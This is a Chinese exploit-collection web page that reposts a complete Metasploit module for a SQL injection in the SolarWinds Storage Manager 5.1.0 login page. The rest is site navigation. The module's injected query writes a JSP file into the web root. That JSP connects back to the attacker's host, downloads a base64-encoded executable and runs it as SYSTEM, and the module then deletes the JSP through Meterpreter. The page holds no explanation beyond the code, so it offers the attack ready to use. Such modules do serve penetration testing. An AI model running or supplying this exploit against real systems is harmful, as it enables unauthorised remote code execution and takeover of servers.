# Solarwinds Storage Manager 5.1.0 SQL注入漏洞
==EXP==
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::EXE
def initialize(info={})
super(update_info(info,
'Name' => "Solarwinds Storage Manager 5.1.0 SQL Injection",
'Description' => %q{
This module exploits a SQL injection found in Solarwinds Storage Manager
login interface. It will send a malicious SQL query to create a JSP file
under the web root directory, and then let it download and execute our malicious
executable under the context of SYSTEM.
},
'License' => MSF_LICENSE,
'Author' =>
[
'r@b13$', # Original discovery by Digital Defense VRT
'muts', # PoC
'sinn3r' # Metasploit
],
'References' =>
[
['EDB', '18818'],
['URL', 'http://ddilabs.blogspot.com/2012/02/solarwinds-storage-manager-server-sql.html'],
['URL', 'http://www.solarwinds.com/documentation/storage/storagemanager/docs/ReleaseNotes/vulnerability.htm']
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "none"
},
'Platform' => 'win',
'Targets' =>
[
# Win XP / 2003 / Vista / Win 7 / etc
['Windows Universal', {}]
],
'Privileged' => false,
'DisclosureDate' => "Dec 7 2011",
'DefaultTarget' => 0))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 9000])
], self.class)
end
#
# A very gentle check to see if Solarwinds Storage Manage exists or not
#
def check
res = send_request_raw({
'method' => 'GET',
'uri' => '/LoginServlet'
})
if res and res.body =~ /\\SolarWinds \- Storage Manager\<\/title\>/ and
res.body =~ /\<img decoding="async" style="padding\-top:30px;" src="\/images\/logo_solarwinds_login\.png" width="163" height="70" alt="SolarWinds Storage Manager"\>/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
#
# Remove the JSP once we get a shell.
# We cannot delete the executable because it will still be in use.
#
def on_new_session(cli)
if cli.type != 'meterpreter'
print_error("Meterpreter not used. Please manually remove #{@jsp_name + '.jsp'}")
return
end
cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
begin
jsp = @outpath.gsub(/\//, "\\\\")
jsp = jsp.gsub(/"/, "")
vprint_status("#{rhost}:#{rport} - Deleting: #{jsp}")
cli.fs.file.rm(jsp)
print_status("#{rhost}:#{rport} - #{@jsp_name + '.jsp'} deleted")
rescue ::Exception => e
print_error("Unable to delete #{@jsp_name + '.jsp'}: #{e.message}")
end
end
#
# Transfer the malicious executable to our victim
#
def on_client_connect(cli)
print_status("#{cli.peerhost}:#{cli.peerport} - Sending executable (#{@native_payload.length} bytes)")
cli.put(@native_payload)
service.close_client(cli)
end
#
# Generate a download+exe JSP payload
#
def generate_jsp_payload
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
my_port = datastore['SRVPORT']
# tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
# This will download our malicious executable in base64 format, decode it back,
# save it as a temp file, and then finally execute it.
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
StringBuffer buf = new StringBuffer();
byte[] shellcode = null;
BufferedOutputStream outstream = null;
try {
Socket s = new Socket("#{my_host}", #{my_port});
BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
while (buf.length() < #{@native_payload.length}) {
buf.append( (char) r.read());
}
BASE64Decoder decoder = new BASE64Decoder();
shellcode = decoder.decodeBuffer(buf.toString());
File temp = File.createTempFile("#{@native_payload_name}", ".exe");
String path = temp.getAbsolutePath();
outstream = new BufferedOutputStream(new FileOutputStream(path));
outstream.write(shellcode);
outstream.close();
Process p = Runtime.getRuntime().exec(path);
} catch (Exception e) {}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp.unpack("H*")[0]
end
#
# Run the actual exploit
#
def inject_exec
# This little lag is meant to ensure the TCP server runs first before the requests
select(nil, nil, nil, 1)
# Inject our JSP payload
print_status("#{rhost}:#{rport} - Sending JSP payload")
pass = rand_text_alpha(rand(10)+5)
hex_jsp = generate_jsp_payload
res = send_request_cgi({
'method' => 'POST',
'uri' => '/LoginServlet',
'headers' => {
'Accept-Encoding' => 'identity'
},
'vars_post' => {
'loginState' => 'checkLogin',
'password' => pass,
'loginName' => "AAA' union select 0x#{hex_jsp},2,3,4,5,6,7,8,9,10,11,12,13,14 into outfile #{@outpath}#"
}
})
# Pick up the cookie, example:
# JSESSIONID=D90AC5C0BB43B5AC1396736214A1B5EB
if res and res.headers['Set-Cookie'] =~ /JSESSIONID=(\w+);/
cookie = "JSESSIONID=#{$1}"
else
print_error("Unable to get a session ID")
return
end
# Trigger the JSP
print_status("#{rhost}:#{rport} - Trigger JSP payload")
send_request_cgi({
'method' => 'POST',
'uri' => '/LoginServlet',
'headers' => {
'Cookie' => cookie,
'Accept-Encoding' => 'identity'
},
'vars_post' => {
'loginState' => 'checkLogin',
'password' => pass,
'loginName' => "1' or 1=1#--"
}
})
res = send_request_raw({
'method' => 'POST',
'uri' => "/#{@jsp_name + '.jsp'}",
'headers' => {
'Cookie' => cookie
}
})
handler
end
#
# The server must start first, and then we send the malicious requests
#
def exploit
# Avoid passing this as an argument for performance reasons
# This is in base64 is make sure our file isn't mangled
@native_payload = [generate_payload_exe].pack("m*")
@native_payload_name = rand_text_alpha(rand(6)+3)
@jsp_name = rand_text_alpha(rand(6)+3)
@outpath = "\"C:/Program Files/SolarWinds/Storage Manager Server/webapps/ROOT/#{@jsp_name + '.jsp'}\""
begin
t = framework.threads.spawn("reqs", false) { inject_exec }
print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
super
ensure
t.kill
end
end
end
</pre></div><div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有,未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldk/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>国内漏洞库</a><br></div></div><div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2237"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><span class="hover-show dropup action action-share"> <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone" target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/2237/&title=Solarwinds_Storage_Manager_5.1.0_SQL注入漏洞-棉花糖会员站&pics=/images/logo_solarwinds_login.png&summary=# Solarwinds Storage Manager 5.1.0 SQL注入漏洞 ==EXP== ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require '..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo" target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/2237/&title=Solarwinds_Storage_Manager_5.1.0_SQL注入漏洞-棉花糖会员站&pic=/images/logo_solarwinds_login.png&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq" target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/2237/&title=Solarwinds_Storage_Manager_5.1.0_SQL注入漏洞-棉花糖会员站&pics=/images/logo_solarwinds_login.png&desc=# Solarwinds Storage Manager 5.1.0 SQL注入漏洞 ==EXP== ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require '..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2237" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/2237/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2237"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author"><div class="card-content mt10 relative"><div class="user-content"><div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a></div><div class="user-info mt20 mb10"><div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老" alt="徽章-年度发烧元老-棉花糖会员站"><img class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093134758.png" data-toggle="tooltip" title="LV6" alt="等级-LV6-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div><div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共3篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>3</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共4.7W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>4.7W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共604条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>604</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共174个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>174</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 176W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>176W+</span></div><div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div></div></div><div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册(20241201版本)-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册(20241201版本)</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册(20241201版本)</div><div class="px12 opacity8 mt6"><item>9月20日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.8W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>3月25日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3621</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241118155703999.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线!免费会员等你来嫖!</div><div class="px12 opacity8 mt6"><item>11月17日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3565</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53274/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/10/20241008074929656.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">已开奖!国庆抽奖,猫咪赞助安全课程300份</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">已开奖!国庆抽奖,猫咪赞助安全课程300份</div><div class="px12 opacity8 mt6"><item>9月29日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3074</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10456/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="上心-SRC培训课-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">上心-SRC培训课</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">上心-SRC培训课</div><div class="px12 opacity8 mt6"><item>5月7日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2428</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版(49个学生分享视频版本)</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版(49个学生分享视频版本)</div><div class="px12 opacity8 mt6"><item>6月8日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 2403</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" style="height:99px"><nav class="article-nav"><div class="main-bg box-body radius8 main-shadow"> <a href="https://vip.bdziyi.com/2207/"><p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i class="fa fa-angle-left em12 mr6"></i>上一篇</p><div class="text-ellipsis-2"> JD-FreeFuck_後台命令執行漏洞_es</div> </a></div><div class="main-bg box-body radius8 main-shadow"> <a href="https://vip.bdziyi.com/2563/"><p class="muted-2-color">下一篇<i class="fa fa-angle-right em12 ml6"></i><i class="fa fa-angle-right em12"></i></p><div class="text-ellipsis-2"> CVE-2021-21985_VMware_vCenter_遠程任意代碼執行漏洞_tr</div> </a></div></nav></div><div class="theme-box relates relates-thumb"><div class="box-body notop"><div class="title-theme">相关推荐</div></div><div class="zib-widget"><div class="swiper-container swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10708/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="海康威视漏洞合集-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">海康威视漏洞合集</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">海康威视漏洞合集</div><div class="px12 opacity8 mt6"><item>6月1日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1110</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/54134/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="易思智能物流无人值守系统 login SQL注入-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">易思智能物流无人值守系统 login SQL注入</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">易思智能物流无人值守系统 login SQL注入</div><div class="px12 opacity8 mt6"><item>11月6日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 785</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53898/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="湖南强智教务管理系统存在 任意文件下载-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">湖南强智教务管理系统存在 任意文件下载</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">湖南强智教务管理系统存在 任意文件下载</div><div class="px12 opacity8 mt6"><item>10月21日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 718</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53648/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/10/20241019092623668.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="投稿:多个poc-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">投稿:多个poc</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">投稿:多个poc</div><div class="px12 opacity8 mt6"><item>10月19日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 647</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53963/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="金蝶天燕ApusicServer servicefactoryservice 远程命令执行-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">金蝶天燕ApusicServer servicefactoryservice 远程命令执行</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">金蝶天燕ApusicServer servicefactoryservice 远程命令执行</div><div class="px12 opacity8 mt6"><item>10月24日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 645</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/54596/"><div class="graphic hover-zoom-img mb10 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/biji/202412081220524.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="用友U8 Cloud 多处反序列化RCE-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">用友U8 Cloud 多处反序列化RCE</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">用友U8 Cloud 多处反序列化RCE</div><div class="px12 opacity8 mt6"><item>12月8日 </item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 620</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div></div></div><div class="theme-box" id="comments"><div class="box-body notop"><div class="title-theme">评论 <small>抢沙发</small></div></div><div class="no_webshot main-bg theme-box box-body radius8 main-shadow"><div class="comment-signarea text-center box-body radius8"><h3 class="text-muted em12 theme-box muted-3-color">请登录后发表评论</h3><p> <a href="javascript:;" class="signin-loader but c-blue padding-lg"><i class="fa fa-fw fa-sign-in mr10" aria-hidden="true"></i>登录</a> <a href="javascript:;" class="signup-loader ml10 but c-yellow padding-lg"><svg class="icon mr10" aria-hidden="true"><use xlink:href="#icon-signup"></use></svg>注册</a></p><p class="social-separator separator muted-3-color em09">社交账号登录</p><div class="social_loginbar"><a rel="nofollow" title="微信登录" href="https://vip.bdziyi.com/oauth/weixingzh?rurl=https%3A%2F%2Fvip.bdziyi.com%2F2237%2F" class="social-login-item weixingzh toggle-radius qrcode-signin"><i class="fa fa-weixin" aria-hidden="true"></i></a></div></div><div id="postcomments"><ol class="commentlist list-unstyled"><div class="text-center comment-null" style="padding:30px 0;"><img style="width:280px;opacity: .7;" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/null-user.svg"><p style="margin-top:30px;" class="em09 muted-3-color separator">请登录后查看评论内容</p></div></ol></div></div></div></div></div><div class="sidebar"><div class="mb20"><div class="box-body notop"><div class="title-theme">作者</div></div><div class="user-card zib-widget widget"><div class="user-cover graphic" style="padding-bottom: 50%;"><img class="lazyload fit-cover user-cover user-cover-id-1" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-lg.svg" data-src="https://oss.bdziyi.com/vip/2024/11/20241126045446604.png" alt="用户封面"></div><div class="card-content mt10 relative"><div class="user-content"><div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a></div><div class="user-info mt20 mb10"><div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老" alt="徽章-年度发烧元老-棉花糖会员站"><img class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093134758.png" data-toggle="tooltip" title="LV6" alt="等级-LV6-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div><div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共3篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>3</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共4.7W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>4.7W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共604条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>604</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共174个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>174</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 176W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>176W+</span></div><div class="user-desc mt10 muted-2-color em09">公众号:棉花糖fans</div></div></div><div class="more-posts-mini"><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54880/">老外百万赏金猎人直播课录屏第三课、第四课</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54867/">黄药师药业管理软件XSDService.asmx 任意文件上传</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54866/">飞鱼星路由器htpasswd 信息泄露</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54865/">致翔软件致翔OA-open_juese SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54864/">秒优科技供应链管理系统doAction SQL注入</a></div><div class="item"><a class="icon-circle text-ellipsis" href="https://vip.bdziyi.com/54863/">神州数码DCME-320 online_list.php 任意文件读取</a></div></div></div></div></div><div></div><div data-affix="true" class="posts-nav-box" data-title="文章目录"></div><div class="theme-box"><div class="box-body notop"><div class="title-theme">最近一周热门文章</div></div><div class="box-body posts-mini-lists zib-widget"><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-red">1</span><a href="https://vip.bdziyi.com/54880/">老外百万赏金猎人直播课录屏第三课、第四课<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-mini"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月22日 </span></item><div class="meta-right"><item class="meta-pay badg badg-sm mr6 c-yellow" data-toggle="tooltip" title="付费阅读"><i class="fa fa-book mr3"></i><span class="em09"><svg class="" aria-hidden="true"><use xlink:href="#icon-points"></use></svg></span>9999</item><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>638</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-yellow">2</span><a href="https://vip.bdziyi.com/54873/">基于Vue+Springboot+Flask+Pytorch的视频网站,深度学习部分使用Flask封装Pytorch代码接口<span class="focus-color"></span></a></h2><div class="item-meta muted-2-color flex jsb ac mt6"><item class="meta-author flex ac"><a href="https://vip.bdziyi.com/author/893/"><span class="avatar-mini"><img alt="xuanyimo的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/10/20241020060126509.jpg" class="lazyload avatar avatar-id-893"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="年费会员" alt="年费会员"></span></a><span class="ml6">12月26日 </span></item><div class="meta-right"><item class="meta-view"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg>501</item></div></div></div></div><div class="posts-mini "><div class="posts-mini-con flex xx flex1 jsb"><h2 class="item-heading text-ellipsis"><span class="badg badg-sm mr3 c-purple">3</span><a href="https://vip.bdziyi.com/54875/">AI PPT 创作实战课+人人都是 prompt 工程师<span 